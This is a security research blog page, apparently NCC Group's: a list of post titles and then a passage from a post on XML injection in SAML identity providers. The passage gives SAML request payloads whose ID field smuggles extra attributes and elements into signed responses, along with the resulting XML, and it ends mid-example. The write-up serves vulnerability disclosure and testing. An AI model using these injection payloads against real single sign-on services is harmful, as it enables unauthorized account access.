Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040)
Why IoT Security Matters
Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom CA Network Flow Analysis (CVE-2021-44050)
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Tracking a P2P network related to TA505
Conference Talks – December 2021
Public Report – Zendoo Proof Verifier Cryptography Review
An Illustrated Guide to Elliptic Curve Cryptography Validation
Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
“We wait, because we know you.” Inside the ransomware negotiation economics.
Detection Engineering for Kubernetes clusters
Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)
TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access
Public Report – Zcash NU5 Cryptography Review
The Next C Language Standard (C23)
Conference Talks – November 2021
Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
Cracking RDP NLA Supplied Credentials for Threat Intelligence
Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet
Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments
Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister
Cracking Random Number Generators using Machine Learning – Part 1: xorshift128
NCC Group placed first in global 5G Cyber Security Hack competition
Paradoxical Compression with Verifiable Delay Functions
A Look At Some Real-World Obfuscation Techniques
SnapMC skips ransomware, steals data
The Challenges of Fuzzing 5G Protocols
Reverse engineering and decrypting CyberArk vault credential files
Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)
Assessing the security and privacy of Vaccine Passports
Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)
Conference Talks – October 2021
Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
Detecting and Hunting for the PetitPotam NTLM Relay Attack
Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)
Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
NSA & CISA Kubernetes Security Guidance – A Critical Review
Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery
Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy
Conference Talks – September 2021
The ABCs of NFC chip security
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
Disabling Office Macros to Reduce Malware Infections
Some Musings on Common (eBPF) Linux Tracing Bugs
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)
Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)
Practical Considerations of Right-to-Repair Legislation
Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478, CVE-2021-35479)
Detecting and Hunting for the Malicious NetFilter Driver
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
NCC Group Research at Black Hat USA 2021 and DEF CON 29
Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
Software-Based Fault Injection Countermeasures (Part 2/3)
An Introduction to Fault Injection (Part 1/3)
Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)
Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0
Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
Tool Release – Reliably-checked String Library Binding
Are you oversharing (in Salesforce)? Our new tool could sniff it out!
Exploit mitigations: keeping up with evolving and complex software/hardware
NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use Against Security Researchers
Handy guide to a new Fivehands ransomware variant
On the Use of Pedersen Commitments for Confidential Payments
Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes
Testing Two-Factor Authentication
Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
Research Paper – Machine Learning for Static Malware Analysis, with University College London
Conference Talks – June 2021
Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and Implementation Review
iOS User Enrollment and Trusted Certificates
Detecting Rclone – An Effective Tool for Exfiltration
Supply Chain Security Begins with Secure Software Development
Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re cryptographically random)
Public Report – Dell Secured Component Verification
RM3 – Curiosities of the wildest banking malware
Conference Talks – May 2021
A Census of Deployed Pulse Connect Secure (PCS) Versions
NCC Group’s Upcoming Trainings at Black Hat USA 2021
Public Report – VPN by Google One: Technical Security & Privacy Assessment
Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s servers on startup
Tool Release – Principal Mapper v1.1.0 Update
SAML XML Injection
The Future of C Code Review
RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986
Tool Release – Solitude: A privacy analysis tool
Deception Engineering: exploring the use of Windows Installer Packages against first stage payloads
Lending a hand to the community – Covenant v0.7 Updates
Technical Advisory: Dell SupportAssist Local Privilege Escalation (CVE-2021-21518)
Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches
Deception Engineering: exploring the use of Windows Service Canaries against ransomware
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
Technical Advisory: Administrative Passcode Recovery and Authenticated Remote Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309, CVE-2021-25306)
Cryptopals: Exploiting CBC Padding Oracles
Investigating Potential Security Vulnerability Manifestation through Various Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be Improved)
NCC Group’s 2020 Annual Research Report
Conference Talks – February/March 2021
Software Verification and Analysis Using Z3
Technical Advisory – Linksys WRT160NL – Authenticated Command Injection (CVE-2021-25310)
Real World Cryptography Conference 2021: A Virtual Experience
RIFT: Analysing a Lazarus Shellcode Execution Method
MSSQL Lateral Movement
Public Report – BLST Cryptographic Implementation Review
Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
Abusing cloud services to fly under the radar
Building an RDP Credential Catcher for Threat Intelligence
Double-odd Elliptic Curves
Using AWS and Azure for Cost Effective Log Ingestion with Data Processing Pipelines for SIEMs
Domestic IoT Nightmares: Smart Doorbells
Technical Advisory: OS Command Injection in Silver Peak EdgeConnect Appliances (CVE-2020-12148, CVE-2020-12149)
Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot Configuration Auditing Introduced in Depthcharge v0.2.0
An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered Harmful
ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP Signatures
ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial and Business Networks
Tool Release – Carnivore: Microsoft External Assessment Tool
Technical Advisory: containerd – containerd-shim API Exposed to Host Network Containers (CVE-2020-15257)
Conference Talks – December 2020
TA505: A Brief History Of Their Time
Decrypting OpenSSH sessions for fun and profit
Past, Present and Future of Effective C
Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS) Vulnerabilities in Oracle Communications Diameter Signaling Router (CVE-2020-14787, CVE-2020-14788)
Technical Advisory: Command Injection
Conference Talks – November 2020
Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon Message (CVE-2020-8255)
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip Extraction (CVE-2020-8260)
Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)
Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation Bypass (CVE-2020-27161)
Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow (CVE-2020-26561)
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 honeypot data release
Technical Advisory – Pulse Connect Secure – RCE via Template Injection (CVE-2020-8243)
Tool – Windows Executable Memory Page Delta Reporter
Salesforce Security with Remote Working
Tool Release – ScoutSuite 5.10
Conference Talks – October 2020
Tool Release – ICPin, an integrity-check and anti-debug detection pintool
Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Online Casino Roulette – A guideline for penetration testers and security researchers
Extending a Thinkst Canary to become an interactive honeypot
StreamDivert: Relaying (specific) network connections
Public Report – Electric Coin Company NU4 Cryptographic Specification and Implementation Review
Machine learning from idea to reality: a PowerShell case study
Conference Talks – September 2020
Whitepaper – Exploring the Security of KaiOS Mobile Applications
Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS Pre-installed Mobile Applications
Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP application
Immortalising 20 Years of Epic Research
Pairing over BLS12-381, Part 3: Pairing!
Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers in 2020
Lights, Camera, HACKED! An insight into the world of popular IP Cameras
Conference Talks – August 2020
Tool Release – Winstrument: An Instrumentation Framework for Windows Application Assessments
Tool Release: Sinking U-Boots with Depthcharge
Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to device compromise on TP-Link C200 IP Camera
Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
Pairing over BLS12-381, Part 2: Curves
Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 Intelligence
An offensive guide to the Authorization Code grant
Technical Advisory – KwikTag Web Admin Authentication Bypass
Pairing over BLS12-381, Part 1: Fields
RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence
Experiments in Extending Thinkst Canary – Part 1
Tool Release – ScoutSuite 5.9.0
Technical Advisory – macOS Installer Local Root Privilege Escalation (CVE-2020-9817)
Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to make threat actors work harder and fail more often
How-to: Importing WStalker CSV (and more) into Burp Suite via Import to Sitemap Extension
Tool: WStalker – an easy proxy to support Web API assessments
Security Considerations of zk-SNARK Parameter Multi-Party Computation
WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
Tool Release – Socks Over RDP Now Works With Citrix
Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
Cyber Security of New Space Paper
In-depth analysis of the new Team9 malware family
Common Insecure Practices with Configuring and Extending Salesforce
Exploring DeepFake Capabilities & Mitigation Strategies with University College London
Game Security
Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
Research Report – Zephyr and MCUboot Security Assessment
CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive
Using SharePoint as a Phishing Platform
Public Report – Coda Cryptographic Review
Shell Arithmetic Expansion and Evaluation Abuse
CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks
Tool Release – Socks Over RDP
Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering
Practical Machine Learning for Random (Filename) Detection
Curve9767 and Fast Signature Verification
CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
The Extended AWS Security Ramp-Up Guide
Code Patterns for API Authorization: Designing for Security
Order Details Screens and PII
How cryptography is used to monitor the spread of COVID-19
Rise of the Sensors: Securing LoRaWAN Networks
C Language Standards Update – Zero-size Reallocations are Undefined Behavior
IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
Exploring Verifiable Random Functions in Code
Crave the Data: Statistics from 1,300 Phishing Campaigns
Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
Tool Release – ScoutSuite 5.8.0
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
LDAPFragger: Bypassing network restrictions using LDAP attributes
Threat Actors: exploiting the pandemic
A Survey of Istio’s Network Security Features
Conference Talks – March 2020
Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation Review
Reviewing Verifiable Random Functions
CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for fun and exploitation
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
Improving Software Security through C Language Standards
Whitepaper – A Tour of Curve 25519 in Erlang
Deep Dive into Real-World Kubernetes Threats
Technical Advisory – playSMS Pre-Authentication Remote Code Execution (CVE-2020-8644)
Interfaces.d to RCE
Properly Signed Certificates on CPE Devices
Conference Talks – February 2020
Tool Release – Collaborator++
Public Report – Electric Coin Company NU3 Specification and Blossom Implementation Audit
Tool Release – Enumerating Docker Registries with go-pillage-registries
Conference Talks – January 2020
Passive Decryption of Ethereum Peer-to-Peer Traffic
On Linux’s Random Number Generation
Demystifying AWS’ AssumeRole and sts:ExternalId
Welcome to the new NCC Group Global Research blog
Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet; and Unprotected client and server data transmission between Android and iOS clients
Security impact of IoT on the Enterprise
Secure Device Provisioning Best Practices: Heavy Truck Edition
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service
Padding the struct: How a compiler optimization can disclose stack memory
Embedded Device Security Certifications
An Introduction to Ultrasound Security Research
PhanTap (Phantom Tap): Making networks spookier one packet at a time
An Introduction to Quantum Computing for Security Professionals
Sniffle: A Sniffer for Bluetooth 5
Compromising a Hospital Network for £118 (Plus Postage & Packaging)
Getting Shell with XAMLX Files
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
Technical Advisory: Unauthenticated SQL Injection in Lansweeper
Jenkins Plugins and Core Technical Summary Advisory
Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
Technical Advisory: Multiple Vulnerabilities in Brother Printers
Technical Advisory: Multiple Vulnerabilities in Xerox Printers
Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and Next Steps
Technical Advisory: Multiple Vulnerabilities in HP Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 9: Adventures with Expert Systems
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 8: Development of Prototype #4 – Building on Takaesu’s Approach with Focus on XSS
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 7: Development of Prototype #3 – Adventures in Anomaly Detection
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 5: Development of Prototype #1 – Text Processing and Semantic Relationships
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 4: Architecture and Design
Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 3: Understanding Existing Approaches and Attempts
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in Social Engineering
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 1: Understanding the Basics and What Platforms and Frameworks Are Available
Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation
Technical Advisory: Citrix Workspace / Receiver Remote Code Execution Vulnerability
The Sorry State of Aftermarket Head Unit Security
Cyber Security in UK Agriculture
NCC Group Connected Health Whitepaper July 2019
Story of a Hundred Vulnerable Jenkins Plugins
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Technical Advisory: Multiple Vulnerabilities in SmarterMail
Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
Chafer backdoor analysis
Finding and Exploiting .NET Remoting over HTTP using Deserialisation
Technical Advisory: Multiple Vulnerabilities in MailEnable
Assessing Unikernel Security
Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
Zcash Overwinter Consensus and Sapling Cryptography Review
Xendbg: A Full-Featured Debugger for the Xen Hypervisor
Use of Deserialisation in .NET Framework Methods and Classes
Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
Nine years of bugs at NCC Group
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
Third party assurance
Turla PNG Dropper is back
Public cloud
Android Cloud Backup/Restore
Spectre on a Television
RokRat Analysis
Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
Technical Advisory: Authentication Bypass in libSSH
Securing Google Cloud Platform – Ten best practices
Public Report – Android Cloud Backup/Restore
Much Ado About Hardware Implants
NCC Group’s Exploit Development Capability: Why and What
Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code Execution on SharePoint
Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
Improving Your Embedded Linux Security Posture With Yocto
How I did not get a shell
Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
Singularity of Origin
Proxy Re-Encryption Protocol: IronCore Public Report
Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data
Celebrating NCC Con Europe 2018
The disadvantages of a blacklist-based approach to input validation
Securing Teradata Database
Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0
Ethics in Security Testing
Freddy: An extension for automatically identifying deserialisation issues in Java and .NET applications
Sobelow Update
House
Principal Mapper (pmapper)
Return of the hidden number problem
Technical advisory: “ROHNP”- key extraction side channel in multiple crypto libraries
CVE-2017-8570 RTF and the Sisfader RAT
Mallory: Transparent TCP and UDP Proxy
Mallory and Me: Setting up a Mobile Mallory Gateway
CyberVillainsCA
DECTbeacon
Fuzzbox
Gizmo
HTTP Profiler
Intent Sniffer
Intent Fuzzer
iSEC Partners Releases SSLyze
Jailbreak
Manifest Explorer
Package Play
ProxMon
pySimReader
SAML Pummel
SecureBigIP
SecureCisco
SecureCookies
SecureIE.ActiveX
WebRATS
AWS Inventory: A tool for mapping AWS resources
Extractor
CMakerer: A small tool to aid CLion’s indexing
Emissary Panda – A potential new malicious tool
SMB hash hijacking & user tracking in MS Outlook
Testing HTTP/2 only web services
Windows IPC Fuzzing Tools
WSBang
WSMap
Nerve
Ragweed
File Fuzzers
Kivlad
Android SSL Bypass
Hiccupy
iOS SSL Killswitch
The SSL Conservatory
TLSPretense — SSL/TLS Client Testing Framework
tcpprox
YoNTMA
Tattler
PeachFarmer
Android-KillPermAndSigChecks
Android-OpenDebug
Android-SSL-TrustKiller
Introspy for Android
RtspFuzzer
SSLyze v0.8
NCLoader
IG Learner Walkthrough
Forensic Fuzzing Tools
Security First Umbrella
Autochrome
WSSiP: A Websocket Manipulation Proxy
AssetHook
Call Map: A Tool for Navigating Call Graphs in Python
Sobelow: Static analysis for the Phoenix Framework
G-Scout
Decoder Improved Burp Suite Plugin
Python Class Informer: an IDAPython plugin for viewing run-time type information (RTTI)
AutoRepeater: Automated HTTP Request Repeating With Burp Suite
TPM Genie
Open Banking: Security considerations & potential risks
scenester
port-scan-automation
Windows DACL Enum Project
Shocker
whitebox
vlan-hopping
tybocer
xcavator
WindowsJobLock
Azucar
Introducing Azucar
Readable Thrift
Decoding network data from a Gh0st RAT variant
Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
Discovering Smart Contract Vulnerabilities with GOATCasino
BLEBoy
APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products
The Single Sign-On (SSO) approach to authentication controls and identity management was quickly adopted by both organizations and large online services for its convenience and added security. The benefits are clear; for end-users, it is far easier to authenticate to a single service and gain access to all required applications. And for administrators, credentials and privileges can be controlled in a single location. However, this convenience presents new opportunities for attackers. A single vulnerability in the SSO authentication flow could be catastrophic, exposing data stored in all services used by an organization.
This blog post will describe a class of vulnerability detected in several SSO services assessed by NCC Group, specifically affecting Security Assertion Markup Language (SAML) implementations. The flaw could allow an attacker to modify SAML responses generated by an Identity Provider, and thereby gain unauthorized access to arbitrary user accounts, or to escalate privileges within an application.
What is SAML?
To begin, a brief overview of how the SAML authentication flow works has been provided below. Feel free to skip this section if you are already familiar with SAML and SSO in general.
SAML is a standard that allows authentication and authorization data to be securely exchanged between different contexts. It is commonly used in web applications to offer SSO capabilities, and can be easily integrated with Active Directory, making it a popular choice for applications used within enterprise environments.
The authentication process relies on a trust relationship between two parties – the Identity Provider (which authenticates end-users), and the Service Provider (which is the application end-users want to access). Under the most common authentication flow, when a user wants to access a service provider, they will be redirected to the identity provider with a SAML request message.
The identity provider authenticates the user if they are not already logged in, and if this is successful, it redirects the user back to the service provider with a SAML response message (usually in the body of a POST request). The SAML response message will contain an assertion that identifies the user and describes a few conditions (the expiration time for the response and an audience restriction which states the service that the assertion is valid for). The service provider should validate the response, the assertion, and the conditions, and only provide the user with access to the application if the authentication was successful.
To prevent tampering, one or both of the SAML response and assertion should include a cryptographic signature that the service provider can verify. The use of a signature will ensure that a malicious user cannot simply modify the user identifier in the assertion, as the signature will no longer be valid.
A more in-depth summary of SAML can be found here on PingIdentity’s website.
The Vulnerability
XML injection is a well-documented vulnerability class, which commonly affected older web applications utilizing XML or SOAP services in the backend. The common case involved user input being directly included in XML messages sent to the backend server. If the user input was not appropriately validated or encoded, an attacker could inject additional XML, and thereby modify request parameters or invoke additional functionality. While still relevant in some applications, XML injection is not nearly as common in 2021, with developers moving to adopt services built on newer data formats such as JSON, YAML, and Protocol Buffers.
In the context of a SAML identity provider, however, XML injection is a concern, as the SAML messages constructed during the authentication flow are XML-based, and contain data that is often sourced from untrusted locations. If this data is included within a SAML assertion or response message unsafely, it may be possible for an attacker to inject additional XML, and change the structure of the SAML message. Depending on the location of the injection and the configuration of the service provider, it may be possible to inject additional roles, modify the receiver of the assertion, or to inject an entirely new username in an attempt to compromise another user’s account. Crucially, it should be noted that the XML for SAML assertions and responses is always built before a cryptographic signature is applied. Therefore, the use of response signatures does not protect against this vulnerability.
This type of vulnerability is most commonly seen in SAML identity providers that naively use string templates to build the SAML XML messages. User-controlled data may be inserted into the template string using a templating language, regex match/replace, or simple concatenation. It is not exclusive to this scenario, though; even implementations which build the XML using appropriate libraries may fall victim to this vulnerability if the library is used incorrectly.
During a number of security assessments of SAML identity providers, NCC Group has successfully leveraged XML injection vulnerabilities to modify signed assertions, and thereby gain unauthorized access to arbitrary user accounts.
Affected Fields
When constructing the SAML response and assertion, the identity provider is highly likely to include data that can be controlled by the user, either directly or indirectly. Obvious examples include the SAML NameID, which uniquely identifies the user (this may be a numeric identifier, a username, or an email address), and additional attributes when they are requested by the service provider, such as the user’s full name, phone number, or occupation.
However, there are some less obvious fields that are, in most SAML implementations, sourced from the SAML request. A non-comprehensive list of fields in the SAML request that may be included in the SAML response/assertion has been provided below:
- The ID of the SAML request is typically included in the InResponseTo attribute of the SAML response. (Note: in identity providers observed by NCC Group, almost all implementations included the SAML request ID in the SAML response. This field is therefore considered the most reliable for probing for XML injection vulnerabilities.)
- The Issuer field, which identifies the issuer of the SAML request, may be included in the Audience field in the SAML assertion.
- The IssueInstant, which states the time the SAML request was generated, may be included in the assertion conditions NotBefore attribute.
- The Destination field, which states the endpoint that receives the SAML request. This field may also be used in the Audience element of the assertion.
Some implementations may even include data sourced from locations external to the basic SAML authentication flow. For example, in one SAML identity provider, if a SAML request was received from an unauthenticated client, the server issued a redirect to the login page with a GET parameter that included the ID of the SAML request. When the user entered their credentials, the server used the GET parameter ID to look up the service provider associated with the SAML request, and then built the SAML response with this ID in the InResponseTo attribute. By modifying the ID GET parameter in the login request, it was possible to inject additional XML into the SAML response.
Identifying the Vulnerability
This vulnerability can be identified using common XML injection probing payloads. The following examples were recreated in a local environment, based on implementations observed during NCC Group security assessments. First, to determine whether XML injection was possible, an intercepting proxy was used to modify the SAML request sent to the identity provider. The payload was inserted into the ID attribute of the request (shown below), and is designed to escape from the attribute value and inject an additional attribute (ncctest). Note that the quotes in the payload are XML encoded as &quot;. This keeps the request well-formed; any standard XML parser decodes these entities when it reads the attribute value, so the identity provider receives the raw quotes and, if it uses a string template, writes them straight into the response:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
When this was processed by the identity provider, the ID attribute was included directly within the SAML response template, in the InResponseTo attribute of the samlp:Response and saml:SubjectConfirmationData elements:
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa828226-5b49-4d14-ac7c-fb64e2263f34" Version="2.0" IssueInstant="2021-02-08T23:46:14.988Z" Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-08T23:51:14.988Z" Recipient="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"/>
If this test is successful, an attempt can be made to inject additional XML elements into the response. While being able to modify the attributes is interesting, it is not particularly useful; if additional XML can be injected, the attacker may be able to modify the SAML assertion, and ultimately gain unauthorized access to another user’s account.
As a basic test, the following SAML request was used to inject an additional XML element (ncc-elem) into the response. As before, the quotes and angle brackets are XML encoded. Also note that the injected element includes another attribute – this is to ensure that the quotes in the template used by the identity provider are balanced, and that the response is valid XML:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB&quot;&gt;&lt;ncc-elem attribute=&quot;aaaa" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
This request produced the following XML in the SAML response:
<samlp:Response
Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp"
ID="_6788c1c3-03a0-452f-80d5-b0296ec1a097"
IssueInstant="2021-02-08T23:57:49.488Z" Version="2.0"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB">
<ncc-elem attribute="aaaa"/>
A similar process can be used for other injection points. If, for example, the identity provider includes the SAML request Issuer field within the Audience of the response, a payload such as the following could be used to inject additional elements. Note here that it is necessary to encode the angle brackets (&lt; and &gt;), since the value sits in element content rather than in an attribute:
<?xml version="1.0" encoding="UTF-8"?>
